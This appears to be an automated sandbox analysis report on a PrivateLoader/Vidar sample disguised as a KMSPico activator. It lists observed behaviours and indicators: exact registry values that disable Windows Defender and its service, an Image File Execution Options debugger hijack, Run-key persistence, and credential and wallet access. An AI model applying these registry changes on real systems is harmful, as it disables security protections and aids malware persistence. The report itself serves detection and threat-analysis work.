privateloader | de3e916b84e5baab191cb54d4e9d810e513939736d5e1b7b43ce54bba7cde10c

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Creates new service(s) 1 TTPs
persistence

New Service
T1050

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Sets file execution options in registry 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

KMSELDI.exeAutoPico.exeKMSELDI.exeAutoPico.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe	KMSELDI.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\Debugger = "C:\\Windows\\SECOH-QAD.exe"	KMSELDI.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe	AutoPico.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\Debugger = "C:\\Windows\\SECOH-QAD.exe"	AutoPico.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe	KMSELDI.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe	AutoPico.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\Debugger = "C:\\Windows\\SECOH-QAD.exe"	AutoPico.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe	KMSELDI.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe\Debugger = "C:\\Windows\\SECOH-QAD.exe"	KMSELDI.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe	KMSELDI.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe	AutoPico.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

cmd.execmd.exeKMSPico_Setup.exeservices.exesystem32.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	KMSPico_Setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	services.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	system32.exe

Executes dropped EXE 18 IoCs

Processes:

ChromeRecovery.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exeKMSPico_Setup.exekms driver.exekmspico_setup.exeservices.exekmspico_setup.tmpsvchost32.exesystem32.exeUninsHs.exeKMSELDI.exeAutoPico.exeSECOH-QAD.exeKMSELDI.exeAutoPico.exe

pid	process
5652	ChromeRecovery.exe
2636	software_reporter_tool.exe
752	software_reporter_tool.exe
3236	software_reporter_tool.exe
1312	software_reporter_tool.exe
2484	KMSPico_Setup.exe
5868	kms driver.exe
5684	kmspico_setup.exe
3092	services.exe
904	kmspico_setup.tmp
2148	svchost32.exe
6128	system32.exe
3644	UninsHs.exe
5452	KMSELDI.exe
5260	AutoPico.exe
2456	SECOH-QAD.exe
116	KMSELDI.exe
2036	AutoPico.exe

Loads dropped DLL 10 IoCs

Processes:

software_reporter_tool.exesystem32.exeSppExtComObj.exe

pid	process
3236	software_reporter_tool.exe
3236	software_reporter_tool.exe
3236	software_reporter_tool.exe
3236	software_reporter_tool.exe
3236	software_reporter_tool.exe
3236	software_reporter_tool.exe
3236	software_reporter_tool.exe
6128	system32.exe
6128	system32.exe
1300	SppExtComObj.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/3092-198-0x0000000000400000-0x000000000041F000-memory.dmp	upx
behavioral1/memory/3644-262-0x0000000000400000-0x0000000000417000-memory.dmp	upx

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

svchost32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	svchost32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchost32.exe = "C:\\Users\\Admin\\svchost32.exe"	svchost32.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 3 IoCs

Processes:

kmspico_setup.tmp

description	ioc	process
File opened for modification	C:\Windows\system32\Vestris.ResourceLib.dll	kmspico_setup.tmp
File created	C:\Windows\system32\is-G389Q.tmp	kmspico_setup.tmp
File created	C:\Windows\system32\is-848R6.tmp	kmspico_setup.tmp

Drops file in Program Files directory 64 IoCs

Processes:

kmspico_setup.tmpKMSELDI.exeelevation_service.exe

description	ioc	process
File created	C:\Program Files\KMSpico\cert\kmscertW8\ProfessionalWMC\is-OKTJJ.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscertW81\ServerStandard\is-G1VEG.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2010\Excel\is-BMO10.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2010\InfoPath\is-0BP8S.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2010\Publisher\is-UHLQF.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2016\Publisher\is-RHE21.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2013\ProPlus\is-K8RDE.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2013\VisioStd\is-3QLG7.tmp	kmspico_setup.tmp
File opened for modification	C:\Program Files\KMSpico\logs\KMSELDI.log	KMSELDI.exe
File created	C:\Program Files\KMSpico\is-690GI.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2010\ProjectPro\is-NI53N.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2013\is-CAFM3.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2016\ProjectPro\is-B6OEA.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2013\Standard\is-EQLOJ.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscertW10\EnterpriseS\is-K3KLM.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\scripts\is-P6IR4.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\scripts\is-4FV18.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2010\Visio\is-CT1V3.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2013\is-2RK6I.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2013\is-4T9PN.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2013\ProjectPro\is-BNN1K.tmp	kmspico_setup.tmp
File opened for modification	C:\Program Files\KMSpico\TokensBackup\Keys.txt	KMSELDI.exe
File created	C:\Program Files\KMSpico\cert\kmscert2013\Publisher\is-S2E4L.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2016\Outlook\is-UEME1.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2016\Word\is-0K1E6.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2016\Word\is-HRBM4.tmp	kmspico_setup.tmp
File opened for modification	C:\Program Files\KMSpico\Service_KMS.exe	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2010\SmallBusBasics\is-CFUGA.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2010\Standard\is-F6J6B.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2013\ProjectPro\is-9RVEH.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscertW6\Business\is-LUI9T.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\TokensBackup\Windows\data.dat	KMSELDI.exe
File created	C:\Program Files\KMSpico\cert\kmscert2013\OneNote\is-HQ0F5.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2013\Outlook\is-NP1QU.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2016\ProPlus\is-NFPJS.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscertW6\Business\is-MGPPK.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2010\ProjectStd\is-JHG9G.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2010\Visio\is-L65EJ.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2013\Access\is-9FCVL.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2013\InfoPath\is-HV7P1.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscertW7\Professional\is-HS6NV.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscertW81\ProfessionalWMC\is-KMM50.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\icons\is-VS158.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\logs\is-30P60.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscertW10\Professional\is-ILA1F.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscertW6\BusinessN\is-RCVPK.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscertW81\ServerStandard\is-GD50A.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\is-NLA2F.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2010\InfoPath\is-A50A2.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2013\Word\is-VEE8V.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2016\ProjectPro\is-KV2TU.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscertW7\Professional\is-CLJAT.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscertW8\CoreN\is-7TD31.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscertW81\CoreConnectedSingleLanguage\is-JNBQ2.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\sounds\is-TJ6NF.tmp	kmspico_setup.tmp
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4308_1329370629\_metadata\verified_contents.json	elevation_service.exe
File created	C:\Program Files\KMSpico\cert\kmscert2010\Excel\is-DS427.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2010\InfoPath\is-UDH79.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscertW10\EnterpriseS\is-76PBL.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\sounds\is-DJKAH.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscertW7\Professional\is-B49LE.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscertW8\Core\is-1HQST.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2010\Publisher\is-VT5BB.tmp	kmspico_setup.tmp
File created	C:\Program Files\KMSpico\cert\kmscert2010\Visio\is-V1GMJ.tmp	kmspico_setup.tmp

Drops file in Windows directory 2 IoCs

Processes:

KMSELDI.exe

description ioc process

File created C:\Windows\SECOH-QAD.dll KMSELDI.exe
File created C:\Windows\SECOH-QAD.exe KMSELDI.exe
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

404 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

536 3444 WerFault.exe Setup.exe
4696 6128 WerFault.exe system32.exe

description	ioc	process
File created	C:\Windows\SECOH-QAD.dll	KMSELDI.exe
File created	C:\Windows\SECOH-QAD.exe	KMSELDI.exe

pid	process
404	sc.exe

pid	pid_target	process	target process
536	3444	WerFault.exe	Setup.exe
4696	6128	WerFault.exe	system32.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

taskmgr.exetaskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

system32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	system32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	system32.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2772 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4892 timeout.exe

pid	process
2772	schtasks.exe

pid	process
4892	timeout.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

System Information Discovery

Processes:

chrome.exechrome.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies Control Panel 3 IoCs

evasion

Processes:

KMSELDI.exeAutoPico.exeKMSELDI.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\Desktop\PaintDesktopVersion = "0"	KMSELDI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\Desktop\PaintDesktopVersion = "0"	AutoPico.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\Desktop\PaintDesktopVersion = "0"	KMSELDI.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

Processes:

kmspico_setup.tmp

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter	kmspico_setup.tmp
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\EnabledV9 = "0"	kmspico_setup.tmp

Modifies data under HKEY_USERS 7 IoCs

Processes:

SppExtComObj.exeAutoPico.exeKMSELDI.exeKMSELDI.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\d450596f-894d-49e0-966a-fd39ed4c4c64	SppExtComObj.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\d450596f-894d-49e0-966a-fd39ed4c4c64\DiscoveredKeyManagementServiceIpAddress = "10.165.99.14"	SppExtComObj.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\d450596f-894d-49e0-966a-fd39ed4c4c64\DiscoveredKeyManagementServiceIpAddress	AutoPico.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588\DiscoveredKeyManagementServiceIpAddress	KMSELDI.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\d450596f-894d-49e0-966a-fd39ed4c4c64\DiscoveredKeyManagementServiceIpAddress	KMSELDI.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588\DiscoveredKeyManagementServiceIpAddress	KMSELDI.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588\DiscoveredKeyManagementServiceIpAddress	AutoPico.exe

Modifies registry class 3 IoCs

Processes:

cmd.execmd.exeKMSPico_Setup.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	KMSPico_Setup.exe

Opens file in notepad (likely ransom note) 3 IoCs
ransomware

Processes:

NOTEPAD.EXENOTEPAD.EXENOTEPAD.EXE

pid process

2276 NOTEPAD.EXE
2476 NOTEPAD.EXE
716 NOTEPAD.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

svchost32.exe

pid process

2148 svchost32.exe

pid	process
2276	NOTEPAD.EXE
2476	NOTEPAD.EXE
716	NOTEPAD.EXE

pid	process
2148	svchost32.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

taskmgr.exe

pid	process
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

taskmgr.exeKMSELDI.exe

pid process

32 taskmgr.exe
116 KMSELDI.exe

pid	process
32	taskmgr.exe
116	KMSELDI.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 59 IoCs

Processes:

chrome.exechrome.exechrome.exe

pid	process
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
3948	chrome.exe
2740	chrome.exe
2740	chrome.exe
2740	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe
2788	chrome.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

Processes:

taskmgr.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exe7zG.exe7zG.exe7zG.exetaskmgr.exekms driver.exeKMSELDI.exeAutoPico.exeAUDIODG.EXEKMSELDI.exe

description	pid	process
Token: SeDebugPrivilege	2992	taskmgr.exe
Token: SeSystemProfilePrivilege	2992	taskmgr.exe
Token: SeCreateGlobalPrivilege	2992	taskmgr.exe
Token: 33	2992	taskmgr.exe
Token: SeIncBasePriorityPrivilege	2992	taskmgr.exe
Token: 33	752	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	752	software_reporter_tool.exe
Token: 33	2636	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	2636	software_reporter_tool.exe
Token: 33	3236	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	3236	software_reporter_tool.exe
Token: 33	1312	software_reporter_tool.exe
Token: SeIncBasePriorityPrivilege	1312	software_reporter_tool.exe
Token: SeRestorePrivilege	5316	7zG.exe
Token: 35	5316	7zG.exe
Token: SeSecurityPrivilege	5316	7zG.exe
Token: SeSecurityPrivilege	5316	7zG.exe
Token: SeRestorePrivilege	4948	7zG.exe
Token: 35	4948	7zG.exe
Token: SeSecurityPrivilege	4948	7zG.exe
Token: SeRestorePrivilege	1884	7zG.exe
Token: 35	1884	7zG.exe
Token: SeSecurityPrivilege	1884	7zG.exe
Token: SeSecurityPrivilege	1884	7zG.exe
Token: SeDebugPrivilege	32	taskmgr.exe
Token: SeSystemProfilePrivilege	32	taskmgr.exe
Token: SeCreateGlobalPrivilege	32	taskmgr.exe
Token: SeDebugPrivilege	5868	kms driver.exe
Token: SeSystemtimePrivilege	5452	KMSELDI.exe
Token: SeDebugPrivilege	5452	KMSELDI.exe
Token: SeSystemtimePrivilege	5260	AutoPico.exe
Token: SeDebugPrivilege	5260	AutoPico.exe
Token: 33	2164	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2164	AUDIODG.EXE
Token: SeSystemtimePrivilege	116	KMSELDI.exe
Token: SeDebugPrivilege	116	KMSELDI.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	process
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
2992	taskmgr.exe
